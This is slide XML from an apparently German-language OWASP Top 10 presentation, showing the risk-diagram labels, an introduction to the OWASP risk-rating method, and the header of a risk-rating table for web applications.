              <a:ext cx="979755" cy="296504"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"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Technische</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE"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de-DE"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Auswirkungen</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5619678" y="2037864"/>
              <a:ext cx="979755" cy="398548"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
                <a:defRPr sz="900" b="1">
                  <a:latin typeface="Liberation Sans"/>
                  <a:ea typeface="Liberation Sans"/>
                  <a:cs typeface="Liberation Sans"/>
                  <a:sym typeface="Liberation Sans"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"/>
                <a:t>Auswirkungen</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE"/>
              </a:br>
              <a:r>
                <a:rPr lang="de-DE"/>
                <a:t>auf das</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE"/>
              </a:br>
              <a:r>
                <a:rPr lang="de-DE"/>
                <a:t>Unternehmen</a:t>
              </a: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de-DE"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Angriff</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tIns="108000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"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Auswirkung</a:t>
              </a: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tIns="108000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"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Auswirkung</a:t>
              </a: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de-DE"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Ressource</a:t>
              </a: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bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="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Funktio</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE"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br>
                <a:rPr lang="de-DE"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de-DE" sz="900" b="1" dirty="0" err="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nalität</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE"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de-DE"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Ressource</a:t>
              </a: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de-DE"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Schwach-</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="de-DE"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de-DE"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stelle</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de-DE" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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de-DE" sz="85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Maß-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE" sz="85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de-DE" sz="850" b="1" err="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nahme</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="85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de-DE" sz="85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Maß-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE" sz="85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de-DE" sz="850" b="1" err="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nahme</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="85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de-DE" sz="85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Maß-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE" sz="85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de-DE" sz="850" b="1" err="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nahme</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="85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de-DE"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Schwach-</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="de-DE"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de-DE"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stelle</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de-DE" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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542815" y="2091359"/>
              <a:ext cx="864339" cy="296504"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"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Sicherheits-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE"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de-DE" sz="900" b="1" dirty="0" err="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maßnahmen</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE"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18" name="Textplatzhalter 17"/>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lIns="36000" rIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Sicherheitsrisiken für</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Anwendungen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 177"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3242158795"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4967778"/>
          <a:ext cx="4554125" cy="4935600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4554125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="346119">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Was</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> sind</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" u="sng" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>meine</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risiken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</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589481">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Die </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t> beschreibt die schwerwiegendsten Risiken von Web-anwendungen, die für ein breites Spektrum an Organisationen relevant sind. Für jedes dieser zehn Risiken stellen wir Informationen zu den beeinflussen-den Faktoren und den technischen Auswirkungen zur Verfügung. Zur Einschätzung verwenden wir folgendes Bewertungsschema auf Basis der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Risk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>-Rating-Methode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                      </a:br>
                      <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Mit dem diesjährigen Dokument haben wir die Tabellen der Risikobewertung überarbeitet, um die Berechnung des Risiko nachvollziehbarer zu machen.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Für die</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Details der Verbesserungen sei hier auf den Abschnitt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t> „</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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Anmerkungen</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="10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br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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zum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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Risikobegriff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>“ verwiesen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Jedes Unternehmen und jede Organisation unterscheidet sich von allen anderen. Ebenso die Angreifer, deren Ziele und die Auswirkungen eines Sicherheitsvorfalles. Wenn beispielsweise eine Organisation ein Content-Management-System (CMS) für eine öffentliche Webseite nutzt, eine andere Firma das gleiche CMS nutzt, um darin (datenschutzrelevante) Patientendaten zu speichern, so können Sicherheitsvorfälle auch bei Einsatz gleicher Software sehr unterschiedliche Auswirkungen haben. Es ist also notwendig bei der Risikobewertung die Risiken, die sich aus der Tätigkeit des Unternehmens ergeben im Blick zu haben und diese auch wirklich umfassen zu verstehen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Die Namen der Risiken tragen – soweit </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
                        <a:t>möglich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t> – die allgemein </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
                        <a:t>üblichen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t> Bezeichnungen um das allgemeine Verständnis zu erhöhen und möglichst wenig zu verwirren. Siehe auch: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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Common Weakness Enumeration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t> (CWE).</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marR="54000"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232905862"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="76199" y="6178487"/>
          <a:ext cx="4424400" cy="1376574"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="612000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="774000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="774000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="774000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="774000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="716400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="80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Bedro-hungs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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br>
                        <a:rPr lang="de-DE"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de-DE"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quellen</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE"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Ausnutzbarkeit</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE"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Schwachstelle </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="800">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE"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Schwachstelle Auffindbarkeit</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE"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Technische Auswirkungen</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="80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Auswirkun</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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-gen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="800" baseline="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auf das</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE"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de-DE"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Unternehmen</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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23040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850" b="1" kern="120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Anwen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="8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br>
                        <a:rPr lang="de-DE" sz="8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de-DE" sz="850" b="1" kern="120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dungs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="8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br>
                        <a:rPr lang="de-DE" sz="8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de-DE" sz="8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spezifisch</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="49530" marB="4953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de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE" sz="850" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sehr häufig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>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3</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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lnSpc>
                          <a:spcPct val="85000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwer-wiegend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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850" b="1"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Daten- &amp;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="850" b="1"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de-DE" sz="850" b="1"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Geschäfts-spezifisch</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="49530" marB="4953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30400">
                <a:tc vMerge="1">
